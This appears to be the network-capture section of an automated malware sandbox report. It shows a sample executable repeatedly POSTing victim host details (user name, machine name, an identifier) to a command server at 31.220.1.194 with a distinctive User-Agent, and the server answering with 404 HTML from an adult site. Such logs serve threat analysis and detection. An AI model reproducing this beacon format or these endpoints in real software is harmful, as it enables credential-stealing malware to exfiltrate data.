20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0a 20 20 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b 7d 0a 20 20 67 74 61 67 28 27 6a 73 27 2c 20 6e 65 77 20 44 61 74 65 28 29 29 3b 0a 0a 20 20 67 74 61 67 28 27 63 6f 6e 66 69 67 27 2c 20 27 47 2d 35 46 31 48 42 4b 51 30 58 45 27 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 21 2d 2d 20 4d 65 74 61 20 56 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 47 72 37 51 47 36 6b 34 57 42 48 67 33 5f 46 64 45 72 64 42 53 71 76 42 79 7a 5f 4c 57 44 37 6c 54 39 47 76 48 74 66 79 39 49 77 22 20 2f 3e 09 0a 3c 73 74 79 6c 65 3e 0a 09 09 09 23 64 63 6c 6d 5f 6d 6f 64 61 6c 5f 73 63 72 65 65 6e 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 38 29 3b 0a 09 09 7d 0a 09 09 23 64 63 6c 6d 5f 6d 6f 64 61 6c 5f 63 6f 6e 74 65 6e 74 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 09 09 7d 0a 09 09 23 64 63 6c 6d 5f 6d 6f 64 61 6c 5f 63 6f 6e 74 65 6e 74 20 68 32 20 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 63 63 63 3b 0a 09 09 7d 0a 09 09 23 64 63 6c 6d 5f 6d 6f 64 61 6c 5f 63 6f 6e 74 65 6e 74 20 70 20 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 39 39 39 3b 0a 09 09 7d 0a 09 09 23 64 63 6c 6d 5f 6d 6f 64 61 6c 5f 63 6f 6e 74 65 6e 74 20 6e 61 76 20 2e 61 76 5f 67 6f 20 7b 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f Data Ascii: <!DOCTYPE html><html lang="ko-KR" prefix="og: https://ogp.me/ns#"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><link rel="profile" href="http://gmpg.org/xfn/11">... Meta social networks -->... Google Analytics -->... Google tag (gtag.js) --><script async src="https://www.googletagmanager.com/gtag/js?id=G-5F1HBKQ0XE"></script><script> window.dataLayer = window.dataLayer \|\| []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'G-5F1HBKQ0XE');</script>... Meta Verification --><meta name="google-site-verification" content="Gr7QG6k4WBHg3_FdErdBSqvByz_LWD7lT9GvHtfy9Iw" /><style>#dclm_modal_screen {background-color: rgba(0,0,0,0.8);}#dclm_modal_content {background-color: #000;}#dclm_modal_content h2 {color: #ccc;}#dclm_modal_content p {color: #999;}#dclm_modal_content nav .av_go {background-colo
Mar 28, 2024 20:56:53.338768005 CET	1286	IN	Data Raw: 72 3a 20 23 37 66 62 66 34 64 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 7d 0a 09 23 64 63 6c 6d 5f 6d 6f 64 61 6c 5f 63 6f 6e 74 65 6e 74 20 6e 61 76 20 2e 61 76 5f 6e 6f 20 7b 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 39 39 Data Ascii: r: #7fbf4d!important;}#dclm_modal_content nav .av_no {background-color: #999999!important;}#dclm-logo img {opacity: 0.5;}</style>... Rank Math - https://rankmath.com/ --><title>Page Not Found -
Mar 28, 2024 20:56:53.338778973 CET	1286	IN	Data Raw: 68 65 6d 61 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 41 64 75 6c 74 45 6e 74 65 72 74 61 69 6e 6d 65 6e 74 22 2c 22 40 69 Data Ascii: hema">{"@context":"https://schema.org","@graph":[{"@type":"AdultEntertainment","@id":"https://www.yaworld.net/#organization","name":"\uc57c\ub3d9\uc6d4\ub4dc","url":"https://www.yaworld.net","logo":{"@type":"ImageObject","@id":"https://www.yaw
Mar 28, 2024 20:56:53.338794947 CET	1286	IN	Data Raw: 26 72 61 71 75 6f 3b 20 ed 94 bc eb 93 9c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 79 61 77 6f 72 6c 64 2e 6e 65 74 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 Data Ascii: » " href="https://www.yaworld.net/feed/" /><link rel="alternate" type="application/rss+xml" title=" » " href="https://www.yaworld.net/comments/feed/" /><script type="text/javascript">/* <![CDATA[ *
Mar 28, 2024 20:56:53.338922977 CET	1286	IN	Data Raw: 75 64 38 33 63 5c 75 64 66 66 34 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 64 62 34 30 5c 75 64 63 36 32 5c 75 64 62 34 30 5c 75 64 63 36 35 5c 75 64 62 34 30 5c 75 64 63 36 65 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 64 62 34 30 5c 75 64 63 37 Data Ascii: ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83e\ude
Mar 28, 2024 20:56:53.338948011 CET	1286	IN	Data Raw: 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 55 52 4c 26 26 55 52 4c 2e 63 72 65 61 74 65 4f 62 6a 65 63 74 55 52 4c 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 42 6c 6f 62 29 74 72 79 7b 76 61 72 20 65 3d 22 70 6f 73 Data Ascii: defined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(s),u.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectU
Mar 28, 2024 20:56:53.338985920 CET	541	IN	Data Raw: 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 70 61 64 64 69 6e 67 3a 20 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 70 2d Data Ascii: ne !important;padding: 0 !important;}</style><link rel='stylesheet' id='wp-block-library-css' href='http://www.yaworld.net/wp-includes/css/dist/block-library/style.min.css?ver=6.4.3' type='text/css' media='all' /><style id='rank-math-t
Mar 28, 2024 20:56:53.339062929 CET	1286	IN	Data Raw: 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e Data Ascii: s-inline-css' type='text/css'>/! This file is auto-generated /.wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.1
Mar 28, 2024 20:56:53.339075089 CET	1286	IN	Data Raw: 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a Data Ascii: gba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238
Mar 28, 2024 20:56:53.453517914 CET	1286	IN	Data Raw: 72 67 65 3a 20 34 32 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 33 30 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d Data Ascii: rge: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	31.220.1.194	80	7628	C:\Users\user\Desktop\XZoxEqlRUw.exe

Timestamp	Bytes transferred	Direction	Data
Mar 28, 2024 20:56:53.651891947 CET	246	OUT	POST /~zadmin/ptr5/mono.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 31.220.1.194 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E0B63912 Content-Length: 176 Connection: close
Mar 28, 2024 20:56:53.836163998 CET	176	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: 'ckav.rujones142233JONES-PC+0FDD42EE188E931437F4FBE2CSEtlc
Mar 28, 2024 20:56:54.826889038 CET	1286	IN	HTTP/1.1 404 Not Found Date: Thu, 28 Mar 2024 19:56:53 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.yaworld.net/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6b 6f 2d 4b 52 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 21 2d 2d 20 4d 65 74 61 20 73 6f 63 69 61 6c 20 6e 65 74 77 6f 72 6b 73 20 2d 2d 3e 0a 09 09 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 41 6e 61 6c 79 74 69 63 73 20 2d 2d 3e 0a 09 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 74 61 67 20 28 67 74 61 67 2e 6a 73 29 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 47 2d 35 46 31 48 42 4b 51 30 58 45 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0a 20 20 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b 7d 0a 20 20 67 74 61 67 28 27 6a 73 27 2c 20 6e 65 77 20 44 61 74 65 28 29 29 3b 0a 0a 20 20 67 74 61 67 28 27 63 6f 6e 66 69 67 27 2c 20 27 47 2d 35 46 31 48 42 4b 51 30 58 45 27 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 21 2d 2d 20 4d 65 74 61 20 56 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 47 72 37 51 47 36 6b 34 57 42 48 67 33 5f 46 64 45 72 64 42 53 71 76 42 79 7a 5f 4c 57 44 37 6c 54 39 47 76 48 74 66 79 39 49 77 22 20 2f 3e 09 0a 3c 73 74 79 6c 65 3e 0a 09 09 09 23 64 63 6c 6d 5f 6d 6f 64 61 6c 5f 73 63 72 65 65 6e 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 38 29 3b 0a 09 09 7d 0a 09 09 23 64 63 6c 6d 5f 6d 6f 64 61 6c 5f 63 6f 6e 74 65 6e 74 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 09 09 7d 0a 09 09 23 64 63 6c 6d 5f 6d 6f 64 61 6c 5f 63 6f 6e 74 65 6e 74 20 68 32 20 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 63 63 63 3b 0a 09 09 7d 0a 09 09 23 64 63 6c 6d 5f 6d 6f 64 61 6c 5f 63 6f 6e 74 65 6e 74 20 70 20 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 39 39 39 3b 0a 09 09 7d 0a 09 09 23 64 63 6c 6d 5f 6d 6f 64 61 6c 5f 63 6f 6e 74 65 6e 74 20 6e 61 76 20 2e 61 76 5f 67 6f 20 7b 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f Data Ascii: <!DOCTYPE html><html lang="ko-KR" prefix="og: https://ogp.me/ns#"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><link rel="profile" href="http://gmpg.org/xfn/11">... Meta social networks -->... Google Analytics -->... Google tag (gtag.js) --><script async src="https://www.googletagmanager.com/gtag/js?id=G-5F1HBKQ0XE"></script><script> window.dataLayer = window.dataLayer \|\| []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'G-5F1HBKQ0XE');</script>... Meta Verification --><meta name="google-site-verification" content="Gr7QG6k4WBHg3_FdErdBSqvByz_LWD7lT9GvHtfy9Iw" /><style>#dclm_modal_screen {background-color: rgba(0,0,0,0.8);}#dclm_modal_content {background-color: #000;}#dclm_modal_content h2 {color: #ccc;}#dclm_modal_content p {color: #999;}#dclm_modal_content nav .av_go {background-colo
Mar 28, 2024 20:56:54.826910973 CET	1286	IN	Data Raw: 72 3a 20 23 37 66 62 66 34 64 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 7d 0a 09 23 64 63 6c 6d 5f 6d 6f 64 61 6c 5f 63 6f 6e 74 65 6e 74 20 6e 61 76 20 2e 61 76 5f 6e 6f 20 7b 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 39 39 Data Ascii: r: #7fbf4d!important;}#dclm_modal_content nav .av_no {background-color: #999999!important;}#dclm-logo img {opacity: 0.5;}</style>... Rank Math - https://rankmath.com/ --><title>Page Not Found -
Mar 28, 2024 20:56:54.826991081 CET	1286	IN	Data Raw: 68 65 6d 61 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 41 64 75 6c 74 45 6e 74 65 72 74 61 69 6e 6d 65 6e 74 22 2c 22 40 69 Data Ascii: hema">{"@context":"https://schema.org","@graph":[{"@type":"AdultEntertainment","@id":"https://www.yaworld.net/#organization","name":"\uc57c\ub3d9\uc6d4\ub4dc","url":"https://www.yaworld.net","logo":{"@type":"ImageObject","@id":"https://www.yaw
Mar 28, 2024 20:56:54.827081919 CET	1286	IN	Data Raw: 26 72 61 71 75 6f 3b 20 ed 94 bc eb 93 9c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 79 61 77 6f 72 6c 64 2e 6e 65 74 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 Data Ascii: » " href="https://www.yaworld.net/feed/" /><link rel="alternate" type="application/rss+xml" title=" » " href="https://www.yaworld.net/comments/feed/" /><script type="text/javascript">/* <![CDATA[ *
Mar 28, 2024 20:56:54.827157021 CET	1286	IN	Data Raw: 75 64 38 33 63 5c 75 64 66 66 34 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 64 62 34 30 5c 75 64 63 36 32 5c 75 64 62 34 30 5c 75 64 63 36 35 5c 75 64 62 34 30 5c 75 64 63 36 65 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 64 62 34 30 5c 75 64 63 37 Data Ascii: ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83e\ude
Mar 28, 2024 20:56:54.827851057 CET	1286	IN	Data Raw: 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 55 52 4c 26 26 55 52 4c 2e 63 72 65 61 74 65 4f 62 6a 65 63 74 55 52 4c 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 42 6c 6f 62 29 74 72 79 7b 76 61 72 20 65 3d 22 70 6f 73 Data Ascii: defined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(s),u.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectU
Mar 28, 2024 20:56:54.827914953 CET	541	IN	Data Raw: 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 70 61 64 64 69 6e 67 3a 20 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 70 2d Data Ascii: ne !important;padding: 0 !important;}</style><link rel='stylesheet' id='wp-block-library-css' href='http://www.yaworld.net/wp-includes/css/dist/block-library/style.min.css?ver=6.4.3' type='text/css' media='all' /><style id='rank-math-t
Mar 28, 2024 20:56:54.828030109 CET	1286	IN	Data Raw: 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e Data Ascii: s-inline-css' type='text/css'>/! This file is auto-generated /.wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.1
Mar 28, 2024 20:56:54.828141928 CET	1286	IN	Data Raw: 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a Data Ascii: gba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238
Mar 28, 2024 20:56:54.935950041 CET	1286	IN	Data Raw: 72 67 65 3a 20 34 32 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 33 30 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d Data Ascii: rge: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	31.220.1.194	80	7628	C:\Users\user\Desktop\XZoxEqlRUw.exe

Timestamp	Bytes transferred	Direction	Data
Mar 28, 2024 20:56:55.077589989 CET	246	OUT	POST /~zadmin/ptr5/mono.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 31.220.1.194 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E0B63912 Content-Length: 149 Connection: close
Mar 28, 2024 20:56:55.262903929 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
Mar 28, 2024 20:56:56.141957045 CET	1286	IN	HTTP/1.1 404 Not Found Date: Thu, 28 Mar 2024 19:56:55 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.yaworld.net/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6b 6f 2d 4b 52 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 21 2d 2d 20 4d 65 74 61 20 73 6f 63 69 61 6c 20 6e 65 74 77 6f 72 6b 73 20 2d 2d 3e 0a 09 09 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 41 6e 61 6c 79 74 69 63 73 20 2d 2d 3e 0a 09 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 74 61 67 20 28 67 74 61 67 2e 6a 73 29 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 47 2d 35 46 31 48 42 4b 51 30 58 45 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0a 20 20 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b 7d 0a 20 20 67 74 61 67 28 27 6a 73 27 2c 20 6e 65 77 20 44 61 74 65 28 29 29 3b 0a 0a 20 20 67 74 61 67 28 27 63 6f 6e 66 69 67 27 2c 20 27 47 2d 35 46 31 48 42 4b 51 30 58 45 27 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 21 2d 2d 20 4d 65 74 61 20 56 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 47 72 37 51 47 36 6b 34 57 42 48 67 33 5f 46 64 45 72 64 42 53 71 76 42 79 7a 5f 4c 57 44 37 6c 54 39 47 76 48 74 66 79 39 49 77 22 20 2f 3e 09 0a 3c 73 74 79 6c 65 3e 0a 09 09 09 23 64 63 6c 6d 5f 6d 6f 64 61 6c 5f 73 63 72 65 65 6e 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 38 29 3b 0a 09 09 7d 0a 09 09 23 64 63 6c 6d 5f 6d 6f 64 61 6c 5f 63 6f 6e 74 65 6e 74 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 09 09 7d 0a 09 09 23 64 63 6c 6d 5f 6d 6f 64 61 6c 5f 63 6f 6e 74 65 6e 74 20 68 32 20 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 63 63 63 3b 0a 09 09 7d 0a 09 09 23 64 63 6c 6d 5f 6d 6f 64 61 6c 5f 63 6f 6e 74 65 6e 74 20 70 20 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 39 39 39 3b 0a 09 09 7d 0a 09 09 23 64 63 6c 6d 5f 6d 6f 64 61 6c 5f 63 6f 6e 74 65 6e 74 20 6e 61 76 20 2e 61 76 5f 67 6f 20 7b 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f Data Ascii: <!DOCTYPE html><html lang="ko-KR" prefix="og: https://ogp.me/ns#"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><link rel="profile" href="http://gmpg.org/xfn/11">... Meta social networks -->... Google Analytics -->... Google tag (gtag.js) --><script async src="https://www.googletagmanager.com/gtag/js?id=G-5F1HBKQ0XE"></script><script> window.dataLayer = window.dataLayer \|\| []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'G-5F1HBKQ0XE');</script>... Meta Verification --><meta name="google-site-verification" content="Gr7QG6k4WBHg3_FdErdBSqvByz_LWD7lT9GvHtfy9Iw" /><style>#dclm_modal_screen {background-color: rgba(0,0,0,0.8);}#dclm_modal_content {background-color: #000;}#dclm_modal_content h2 {color: #ccc;}#dclm_modal_content p {color: #999;}#dclm_modal_content nav .av_go 